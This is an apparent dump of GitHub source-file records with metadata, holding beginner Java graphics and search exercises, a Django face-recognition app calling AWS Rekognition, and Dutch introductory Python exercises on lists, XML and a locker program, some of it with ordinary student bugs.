g, int x, int y, int size, int stagger) {\n\t\tg.drawOval(x,y,size,size); // Draw outer large circle.\n\t\tfor(int i=1;i<=3;i++) { // Draw horizontal ovals.\n\t\t\tint curStagger = stagger*i;\n\t\t\tint curHalfStagger = 
(stagger/2)*i;\n\t\t\tg.drawOval(x,y+curHalfStagger,size,size-curStagger);\n\t\t}\n\t\tfor(int i=1;i<=3;i++) { // Draw veritcal ovals.\n\t\t\tint curStagger = stagger*i;\n\t\t\tint curHalfStagger = (stagger/2)*i;\n\t\t\tg.drawOval(x+curHalfStagger,y,size-curStagger,size);\n }\n\t}\n\tstatic void drawFlower(Graphics g, int x, int y, int petalSize) {\n\t\t// Top Right\n\t\tg.drawArc(x,y+petalSize,petalSize,petalSize,90,270);\n\t\tg.fillArc(x,y+petalSize,petalSize,petalSize,90,270);\n\t\t//Top Left\n\t\tg.drawArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n\t\tg.fillArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n\t\t// Bottom Right\n\t\tg.drawArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n\t\tg.fillArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n\t\t// Bottom Left\n\t\tg.drawArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n\t\tg.fillArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n\t}\n}"
},
{
"alpha_fraction": 0.5037888288497925,
"alphanum_fraction": 0.6164751648902893,
"avg_line_length": 34.894737243652344,
"blob_id": "cc07010edf726205ca08c45d64c98881e5ae6aad",
"content_id": "9c1110770d37669546f17a95c7289de1289d5073",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4091,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 114,
"path": "/Java/APCSA/Lab02avstPRE.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab02avst.java\n// The AWT Graphics Program\n// This is the student, starting version of Lab02a\n\n\nimport java.awt.*;\nimport java.applet.*;\n\n\npublic class Lab02avstPRE extends Applet\n{\n\n\tpublic void paint(Graphics g)\n\t{\n Color black = new Color(0,0,0);\n Color white = new Color(255,255,255);\n Color red = new Color(255,0,0);\n Color green = new Color(0,255,0);\n Color blue = new Color(0,0,255);\n Color gray = new Color((float) 0, (float) 0,(float) 0,(float) 0.5);\n // Set screen size. This will be different on lower resolution screens an will likely break if lowered much further.\n this.setSize(3000,1600);\n // Set black color.\n g.setColor(black);\n // DRAW CUBE\n drawCube(g,500,500,500);\n\t\t// DRAW SPHERE\n drawSphere(g,450,450,500,130);\n\t\t// DRAW INSCRIBED/CIRCUMSCRIBED TRIANGLE\n g.drawOval(1500,500,400,400);\n g.drawPolygon(new int[] {1600,1898,1600},new int[] {530,700,878},3);\n g.drawOval(1600,600,200,200);\n\t\t// DRAW APCS\n // A outside\n g.setColor(red);\n g.drawRect(500,1200,150,250);\n g.fillRect(500,1200,150,250);\n // A inside\n g.setColor(white);\n g.drawRect(550,1350,50,100);\n g.fillRect(550,1350,50,100);\n g.drawRect(550,1250,50,50);\n g.fillRect(550,1250,50,50);\n // P outside\n g.setColor(blue);\n g.drawRect(700,1200,150,250);\n g.fillRect(700,1200,150,250);\n // P inside\n g.setColor(white);\n g.drawRect(750,1350,100,100);\n g.fillRect(750,1350,100,100);\n g.drawRect(750,1250,50,50);\n g.fillRect(750,1250,50,50);\n // C outside\n g.setColor(green);\n g.drawRect(900,1200,150,250);\n g.fillRect(900,1200,150,250);\n // C inside\n g.setColor(white);\n g.drawRect(950,1250,100,150);\n g.fillRect(950,1250,100,150);\n // S outside\n g.setColor(gray);\n g.drawRect(1100,1200,150,250);\n g.fillRect(1100,1200,150,250);\n // S inside\n g.setColor(white);\n g.drawRect(1150,1250,100,50);\n\t\tg.fillRect(1150,1250,100,50);\n g.drawRect(1100,1350,100,50);\n g.fillRect(1100,1350,100,50);\n // DRAW PACMEN FLOWER\n g.setColor(black);\n drawFlower(g,1400,800,100);\n }\n static void drawCube(Graphics g, int x, int y, int size) {\n int shift = size/4;\n int shiftedX = x - shift;\n int shiftedY = y - shift;\n g.drawRect(x,y,size,size); // Square one.\n g.drawRect(shiftedX,shiftedY,size,size); // Square two, which is a moved square one.\n g.drawLine(x,y,shiftedX,shiftedY); // This line and the next 3 draw the connecting lines to make it look like it's in a cube.\n g.drawLine(x+size,y,shiftedX+size,shiftedY);\n g.drawLine(x+size,y+size,shiftedX+size,shiftedY+size);\n g.drawLine(x,y+size,shiftedX,shiftedY+size);\n }\n static void drawSphere(Graphics g, int x, int y, int size, int stagger) {\n g.drawOval(x,y,size,size); // Draw big circle.\n for(int i=1;i<=3;i++) { // Draw horizontal ovals.\n int curStagger = stagger * i;\n int curHalfStagger = (stagger/2) * i;\n g.drawOval(x,y+curHalfStagger,size,size-curStagger);\n }\n for(int i=1;i<=3;i++) { // Draw veritcal ovals.\n int curStagger = stagger * i;\n int curHalfStagger = (stagger/2) * i;\n g.drawOval(x+curHalfStagger,y,size-curStagger,size);\n }\n }\n static void drawFlower(Graphics g, int x, int y, int petalSize) {\n // Top Right\n g.drawArc(x,y+petalSize,petalSize,petalSize,90,270);\n g.fillArc(x,y+petalSize,petalSize,petalSize,90,270);\n //Top Left\n g.drawArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n g.fillArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n // Bottom Right\n g.drawArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n g.fillArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n 
// Bottom Left\n g.drawArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n g.fillArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n }\n}"
},
{
"alpha_fraction": 0.41914892196655273,
"alphanum_fraction": 0.4446808397769928,
"avg_line_length": 26.676469802856445,
"blob_id": "2fc61b1d97ec86cbfb5cbd0640b71a438139015e",
"content_id": "c294cae9fd7161a5cdc6205ebfc633cf266c1c72",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 940,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 34,
"path": "/Java/APCSA/BinarySearch.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "import java.util.ArrayList;\npublic class BinarySearch {\n public static void main(String[] args) {\n ArrayList<Integer> list = new ArrayList<Integer>();\n list.add(0);\n list.add(1);\n list.add(5);\n list.add(7);\n list.add(8);\n list.add(72);\n list.add(96);\n list.add(189);\n list.add(336);\n list.add(900);\n int sN = 8;\n boolean found = false;\n int min = 0;\n int max = list.size() - 1;\n int mid = (max+min)/2;\n while (!found && max>=min) {\n if (max-1 == mid && mid == min)\n break;\n if (list.get(mid) == sN)\n found = true;\n else if (list.get(mid) > sN)\n max = mid;\n else if (list.get(mid) < sN)\n min = mid;\n mid = (max+min)/2;\n }\n System.out.println(found);\n System.out.println(mid);\n }\n}"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.5952380895614624,
"avg_line_length": 25.658536911010742,
"blob_id": "94f74c1f37c8c3b4cb565df82fb827dc8ea144c8",
"content_id": "005ae1f6ad480f9f9f0d08f8888b037ff92bba22",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1092,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 41,
"path": "/Java/APCSA/Lab04vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab04vst.java\n// This is the student, starting version of the Lab04 assignment.\n\n\nimport java.awt.*;\nimport java.applet.*;\n\n\npublic class Lab04vst extends Applet\n{\n\tpublic void paint(Graphics g)\n\t{\n this.setSize(1000, 800);\n\t\tint width = 980;\n\t\tint height = 630;\n\t\tint x1 = 10;\n\t\tint y1 = 640;\n\t\tint x2 = 990;\n\t\tint y2 = 640;\n\t\tg.drawRect(10,10,width,height);\n doIt(g,width,height,x2,y1,x1,x2,false,true);\n doIt(g,width,height,x1,y1,x1,x1,true,true);\n doIt(g,width,height,x2,x1,y2,x2,false,false);\n doIt(g,width,height,x1,x1,y1,x1,true,false);\n\t}\n static void doIt(Graphics g, int width, int height, int tmpA, int staticA, int tmpB, int staticB, boolean isFirstAdding, boolean isSecondAdding) {\n for (int i=0;i<=51;i++) {\n g.drawLine(tmpA,staticA,staticB,tmpB);\n if (isFirstAdding) {\n tmpA+=width/50;\n } else if (!isFirstAdding) {\n tmpA-=width/50;\n }\n if (isSecondAdding) {\n tmpB+=height/50;\n } else if (!isSecondAdding) {\n tmpB-=height/50;\n }\n }\n }\n}"
}
] | 21 |
anurag21raghav/Face-Recognizer | https://github.com/anurag21raghav/Face-Recognizer | 4773a3294562b8ff182034e4cac481a459f8e8d2 | b0c6fc3168c93b507cd1c4303bd70ff9a8e7351b | 4c2e8740ee5b356b771d86d031994e60d2abe77d | refs/heads/master | 2021-01-23T09:45:38.816665 | 2017-09-08T12:37:02 | 2017-09-08T12:37:02 | 102,598,481 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6729699373245239,
"alphanum_fraction": 0.6790878772735596,
"avg_line_length": 32.314815521240234,
"blob_id": "a92766728239bea15c0e2066bca41b7d1f05def7",
"content_id": "31edcc36412b5265135be7dcc6f95f2f469616a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1798,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 54,
"path": "/recognizer/views.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport boto3\nfrom .models import Image\n\nbucket = \"rekognition-warm-up\"\nKEY = \"{{ uploaded_file_url }}\"\nCOLLECTION = Image.objects.all()\nsourceFile = 'source.jpg'\ntargetFile = 'target.jpg'\n\ndef search_faces_by_image(bucket, key, collection_id, threshold=80, region=\"us-east-1\"):\n\trekognition = boto3.client(\"rekognition\", region)\n\tresponse = rekognition.search_faces_by_image(\n\t\tImage={\n\t\t\t\"S3Object\": {\n\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\"Name\": key,\n\t\t\t}\n\t\t},\n\t\tCollectionId=collection_id,\n\t\tFaceMatchThreshold=threshold,\n\t)\n\treturn response['FaceMatches']\n\ndef index(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n records = search_faces_by_image(BUCKET, uploaded_file_url, COLLECTION)\n return render(request, 'recognizer/output.html', {'records': records})\n return render(request, 'recognizer/index.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'recognizer/index.html')\n\ndef output(request):\n\tclient = boto3.client('rekognition')\n\tresponse=client.compare_faces(SimilarityThreshold=70,\n\t\t\t\t\t\t\t\t\tSourceImage={'S3Object':\n\t{'Bucket':bucket, 'Name':sourceFile}},\n\t\t\t\t\t\t\t\t\tTargetImage={'S3Object':\n\t{'Bucket':bucket, 'Name':targetFile}})\n\n\tfor faceMatch in response['FaceMatches']:\n\t\tposition = faceMatch['Face']['BoundingBox']\n\t\tconfidence = str(faceMatch['Face']['Confidence'])\n\t\tprint('The face at ' + \n\t\t\t\tstr(position['Left']) + ' ' + \n\t\t\t\tstr(position['Top']) + \n\t\t\t\t' matches with ' + confidence + '% confidence')"
},
{
"alpha_fraction": 0.7473002076148987,
"alphanum_fraction": 0.7537797093391418,
"avg_line_length": 29.733333587646484,
"blob_id": "0d3c43aa11bff140924e0de17cdf273d856174a6",
"content_id": "15b256b5e97267e90cbcec9412effc4ead4b7273",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 15,
"path": "/recognizer/models.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "import os\nfrom django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\ndef get_image_path(instance, filename):\n\treturn os.path.join('photos', str(instance.id), filename)\n\nclass Image(models.Model):\n\tuser = models.ForeignKey('auth.User')\n\tname = models.CharField(max_length=200, default=\"N/A\")\n\timage = models.ImageField(upload_to=get_image_path, blank=True, null=True)\n\tupload_date = models.DateTimeField(\n\t\tdefault=timezone.now)\n\t\n"
},
{
"alpha_fraction": 0.7736389636993408,
"alphanum_fraction": 0.7736389636993408,
"avg_line_length": 25.923076629638672,
"blob_id": "c0f053c08fe59c492cb37a78dd7d2bea1a01376a",
"content_id": "cbcaaa483a48dc96d59cab290b7e8d146b036954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 13,
"path": "/recognizer/urls.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\n\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport os\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.output, name='output'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)"
},
{
"alpha_fraction": 0.6745479702949524,
"alphanum_fraction": 0.682892918586731,
"avg_line_length": 27.760000228881836,
"blob_id": "85b379f6156bd4af3492c2593ab4d3c8de0d4a18",
"content_id": "95c5b6644bd3685279a1c418ffc864267b6f51b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 25,
"path": "/recognizer/face_search.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "import boto3\n\nBUCKET = \"amazon-rekognition\"\nKEY = \"{{ uploaded_file_url }}\"\nCOLLECTION = \"../media/photos/None/\"\n\ndef search_faces_by_image(bucket, key, collection_id, threshold=80, region=\"eu-west-1\"):\n\trekognition = boto3.client(\"rekognition\", region)\n\tresponse = rekognition.search_faces_by_image(\n\t\tImage={\n\t\t\t\"S3Object\": {\n\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\"Name\": key,\n\t\t\t}\n\t\t},\n\t\tCollectionId=collection_id,\n\t\tFaceMatchThreshold=threshold,\n\t)\n\treturn response['FaceMatches']\n\nfor record in search_faces_by_image(BUCKET, KEY, COLLECTION):\n\tface = record['Face']\n\tprint \"Matched Face ({}%)\".format(record['Similarity'])\n\tprint \" FaceId : {}\".format(face['FaceId'])\n\tprint \" ImageId : {}\".format(face['ExternalImageId'])\n"
}
] | 4 |
ColmHughes/day-16-20---Python-OOP | https://github.com/ColmHughes/day-16-20---Python-OOP | 27b36d0ff435f7ede2eb4a86547fe51096abbc1c | 7c6095e027cfb2ad4fa115fe9d4a13346211e1bf | 8da9136bace2c4b9ee6a8a9d90a68b3ee95b3ff8 | refs/heads/master | 2020-03-17T16:00:20.220841 | 2018-05-16T23:12:18 | 2018-05-16T23:12:18 | 133,732,362 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4389830529689789,
"alphanum_fraction": 0.4457627236843109,
"avg_line_length": 20.88888931274414,
"blob_id": "2479adb851ab3e0fa796460f818720a0c0e895ce",
"content_id": "907baa2c84ae5cc7d2d97ae3941ec3b8c25d8416",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 27,
"path": "/tree.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Tree():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n \n def add(self, value):\n if value < self.value:\n if t.left == None:\n t.left = Tree(value)\n else:\n t.left.add(value)\n else:\n if t.right == None:\n t.right = Tree(value)\n else:\n t.right.add(value)\n \n def get_nums(self):\n \nt = Tree()\nt.add(7)\nt.add(2)\nt.add(13)\nprint(t.value)\nprint(t.left.value)\nprint(t.right.value)"
},
{
"alpha_fraction": 0.48941799998283386,
"alphanum_fraction": 0.5052909851074219,
"avg_line_length": 15.47826099395752,
"blob_id": "8963f3ef46b20d71eda01475421fefc33bccc18d",
"content_id": "2ec173bbcb8c6e35eee37c6ac42734f2d75e8ac8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 23,
"path": "/donut.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Donut():\n \n \n def __init__(self):\n self.donut_size = 100\n \n def bite_donut(self):\n if self.donut_size > 0:\n self.donut_size -= 25\n \nt = Donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nt.bite_donut()\nprint(t.donut_size)\n\nprint(\"------------------------\")\n\ne = Donut()\ne.bite_donut()\nprint(e.donut_size)"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5016447305679321,
"avg_line_length": 18.483871459960938,
"blob_id": "3ba31645fb39e81b66484b3b73bc53c64b7121fb",
"content_id": "c6309f9483f4dc3f594be20e131b9764bed454e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 31,
"path": "/report.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Report():\n \n \n def __init__(self):\n self.content = 0\n \n \n def _print_header(self):\n print(\"This is the header\")\n \n def _print_body(self):\n print(\"This is the body\")\n \n def _print_footer(self):\n print(\"This is the footer\")\n \n def print_report(self):\n self._print_header()\n self._print_body()\n self._print_footer()\n \n \n \nclass UpperCaseReport(Report):\n def _print_body(self):\n print(\"UPPER CASE REPORT\")\n \n \n \nreport = UpperCaseReport()\nreport.print_report()\n "
},
{
"alpha_fraction": 0.5353383421897888,
"alphanum_fraction": 0.548872172832489,
"avg_line_length": 22.714284896850586,
"blob_id": "79b9a56a0a0fdb22cd87908341122dcbb9b6ff26",
"content_id": "d9248e6f3458b59ca1f3c29a8b569121727d8a60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 665,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 28,
"path": "/vehicle.py",
"repo_name": "ColmHughes/day-16-20---Python-OOP",
"src_encoding": "UTF-8",
"text": "class Vehicle():\n \n vehicles_running = 0\n \n def __init__(self):\n self.fuel = 100\n self.running = False\n \n def start(self):\n print(\"Starting up the Vehicle\")\n self.fuel -= 1\n self.running = True\n Vehicle.vehicles_running += 1\n \n def stop(self):\n print(\"Stopping the Vehicle\")\n self.running = False\n Vehicle.vehicles_running -= 1\n print(\"You have {0} vehicles running\".format(Vehicle.vehicles_running))\n \n \n def fuelgauge(self):\n print(\"You have {0} litres of fuel left\".format(self.fuel))\n \n \nv = Vehicle()\nv.start()\nprint(v.running)\n\n"
}
] | 4 |
SilentCeline/Yasmara_besten_V1J_PROGRAMMING | https://github.com/SilentCeline/Yasmara_besten_V1J_PROGRAMMING | b66cdbe2c287c257ec7fbadd73d26aeb6c12cc40 | d9b7e7836c6906a040f589552de1fc2a70478545 | 078d0b46ecec5c23ca62340fa2d6193c6e0e1d55 | refs/heads/master | 2020-04-02T22:49:00.472718 | 2018-10-26T14:11:48 | 2018-10-26T14:11:48 | 154,845,461 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6122254133224487,
"alphanum_fraction": 0.6131805181503296,
"avg_line_length": 25.200000762939453,
"blob_id": "b69e27cd1edfed54194fddcc03ddfc5ef6530358",
"content_id": "1bde99bae2107006b50d827e7a6b2dc1275ec2b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 40,
"path": "/Les 12/programming_3_xml_stationslijsten.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import xmltodict\n\ndef processXML(filename):\n with open(filename) as myXMLfile:\n filecontenstring = myXMLfile.read()\n xmldictonary = xmltodict.parse(filecontenstring)\n return xmldictonary\n\nnamendict = processXML('prog_stationslijst.xml')\nstations = namendict['Stations']['Station']\n\ndef een():\n codeplustype = ''\n for station in stations:\n codeplustype += 'Dit zijn de codes en types van de 4 stations:' + '\\n' + (station['Code']) + ' - ' + (station['Type']) + '\\n'\n\n print(codeplustype)\n\neen()\n\ndef twee():\n zinsynoniemen = ''\n for station in stations:\n if station['Synoniemen'] is not None:\n zinsynoniemen += str(station['Code']) + ' - ' + str(station['Type']) + ' ' + str(station['Synoniemen']['Synoniem']) + '\\n'\n else:\n continue\n\n print(zinsynoniemen)\n\n\ntwee()\n\ndef drie():\n langenamenstation = ''\n for station in stations:\n langenamenstation += str(station['Code']) + ' - ' + station['Namen']['Lang'] + '\\n'\n print(langenamenstation)\n\ndrie()"
},
{
"alpha_fraction": 0.5584415793418884,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 18.5,
"blob_id": "9cbf186aca6d856960885bdce159c9a2c6c3bf02",
"content_id": "c31636ae7d945102db8051af224e58d6ddd7300b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 4,
"path": "/les6/programming_2_functie_met_list_parameter.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def som(getallenlijst):\n print (sum(getallenlijst))\n\nsom ([5, 8, 9, 5, 5])"
},
{
"alpha_fraction": 0.5668449401855469,
"alphanum_fraction": 0.5814292430877686,
"avg_line_length": 34.482757568359375,
"blob_id": "983e9edbbeb8ff016e675fff54359e0c8f6fb061",
"content_id": "8cafffb01fd26e73e31e568a49b9c41c03457edd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2057,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 58,
"path": "/les 8/programming_finalassignment_bagagekluizen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def toon_aantal_kluizen_vrij(tekst_bestand):\n max_aantal_kluizen = 12\n aantal_regels = 0\n for i in tekst_bestand:\n if i == '\\n':\n aantal_regels += 1\n print(\"Aantal kluizen vrij: \", max_aantal_kluizen - aantal_regels)\n\ndef nieuwe_kluis(tekstBestand):\n kluisnummers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n gebruikte_kluisnummer = []\n bruikbare_nummers = []\n for line in tekstBestand:\n currentline = line.split(\";\")\n gebruikte_kluisnummer.append(int(currentline[0]))\n for x in kluisnummers:\n if x not in gebruikte_kluisnummer:\n bruikbare_nummers.append(x)\n if len(gebruikte_kluisnummer) < 12:\n wachtwoord = input(\"Voer uw wachtwoord van minimaal 4 tekens in: \")\n if len(wachtwoord) >= 4:\n bestand = open(\"Kluizen.txt\", \"a\")\n bestand.write(str(min(bruikbare_nummers)) + ';' + str(wachtwoord) + '\\n')\n bestand.close()\n print('Uw kluisnummer is: ' + str(min(bruikbare_nummers)))\n return\n else:\n print(\"Er zijn geen kluizen beschikbaar.\")\n\n return\n\ndef kluis_openen(bestand):\n nummer = input(\"Wat is uw kluisnummer: \")\n wachtwoord = input(\"Wat is uw wachtwoord: \")\n gegevens = nummer + ';' + wachtwoord + '\\n'\n if gegevens in bestand:\n print(\"Kluis nummer \" + str(nummer) + \" is nu open.\")\n else:\n print(\"Kluisnummer en/of code incorrect.\")\n return\n\ndef main():\n bestand = open(\"Kluizen.txt\", \"r+\")\n tekst_bestand = bestand.readlines()\n bestand.close()\n print(\"1: Ik wil weten hoeveel kluizen nog vrij zijn \\n2: Ik wil een nieuwe kluis \\n3: Ik wil iets uit mijn kluis halen\")\n keuze = int(input(\"Wat wilt u doen: \"))\n if keuze == 1:\n toon_aantal_kluizen_vrij(tekst_bestand)\n elif keuze == 2:\n nieuwe_kluis(tekst_bestand)\n elif keuze == 3:\n kluis_openen(tekst_bestand)\n else:\n print(\"Foute invoer; Voer een andere optie in\")\n\n\nmain()"
},
{
"alpha_fraction": 0.7118644118309021,
"alphanum_fraction": 0.7457627058029175,
"avg_line_length": 18.83333396911621,
"blob_id": "1295c157bc51c9efd180b5b71db9bc30a2c05a98",
"content_id": "2409093772c729d78906705b4b21a184510ba615",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 6,
"path": "/les3/Programming_1_listsENstrings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "favorieten = ['K3']\nprint(favorieten)\nfavorieten.append('K4')\nprint(favorieten)\nfavorieten[1] = 'K5'\nprint(favorieten)"
},
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.6376811861991882,
"avg_line_length": 22.33333396911621,
"blob_id": "11c18314f3d319dcfb10580717252911fd71b9a9",
"content_id": "3fafb689f165d76ac11bfff26cc404b67c4c9ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 3,
"path": "/les3/Programming_2_listsENnumbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "list = [3,7,-2,12]\nverschil = (max(list) - min(list))\nprint(verschil)"
},
{
"alpha_fraction": 0.5158730149269104,
"alphanum_fraction": 0.5634920597076416,
"avg_line_length": 10.409090995788574,
"blob_id": "1fb92657e194f46254b946e2b63c63920a88086c",
"content_id": "c628ddec4b32768e9ef30f60ddb00249ca0f0378",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 22,
"path": "/Les 12/programming_2_namespaces.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "b = 7\n\ndef verdubbelB(b):\n b = b + b\n print(b)\n\nverdubbelB(7)\n\nprint(b)\n\nimport datetime\ntime = datetime.datetime.today()\nprint(time.strftime((\"%H:%M:%S\")))\n\n\ndef g(x):\n return 5 + x + 10 #18\n\ndef f(y):\n return 2*y + 1 #7\n\nprint(f(3)+ g(3))\n\n"
},
{
"alpha_fraction": 0.7147239446640015,
"alphanum_fraction": 0.7177914381027222,
"avg_line_length": 31.700000762939453,
"blob_id": "894f299b1ad590a0e6225c2396446c5a79652568",
"content_id": "cf5ca6a09cc6e611d2fd2265874824afe1c38ec6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 10,
"path": "/les6/programming_4_functie_met_if.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "oldpassword_input = input(\"Voer uw oude wachtwoord in: \")\nnewpassword_input = input(\"Voer uw nieuwe wachtwoord in: \")\n\ndef new_password(oldpassword,newpassword):\n if newpassword != oldpassword and len(newpassword) > 6:\n return(True)\n else:\n return(False)\n\nnew_password(oldpassword_input, newpassword_input)"
},
{
"alpha_fraction": 0.6158273220062256,
"alphanum_fraction": 0.6618704795837402,
"avg_line_length": 33.79999923706055,
"blob_id": "d06ab311d096fd6976535395fcf6d7a1e0c2f7cd",
"content_id": "b5532a165c45f5c7669cce4c0e6dbe6b7a6c2da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/les 8/programming_4_two-dimensional_lists.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "studentencijfers = [ [95, 92, 86],[66, 75, 54],[89, 72, 100],[34, 0, 0] ]\n\ndef gemiddelde_per_student(studentencijfers):\n gemiddelde_per_student = []\n for i in studentencijfers:\n gemiddelde = (i[0] + i[1] + i[2]) / 3\n gemiddelde_per_student.append(gemiddelde)\n return gemiddelde_per_student\n\ndef gemiddelde_van_alle_studenten(studentencijfers):\n totaal = 0\n aantal = len(studentencijfers[0])\n for i in studentencijfers:\n cijfer = i[0] + i[1] + i[2]\n totaal += cijfer / aantal\n totaal = totaal / len(studentencijfers)\n return totaal\n\nprint(gemiddelde_per_student(studentencijfers))\nprint(gemiddelde_van_alle_studenten(studentencijfers))"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6315789222717285,
"avg_line_length": 24.66666603088379,
"blob_id": "b94f4730d38740f1fae4fd9e7faf4b10a3e5a9fa",
"content_id": "a62c892e660293018a0f8bce5ceade08ea8631a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/les5/programming_4_for_if_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
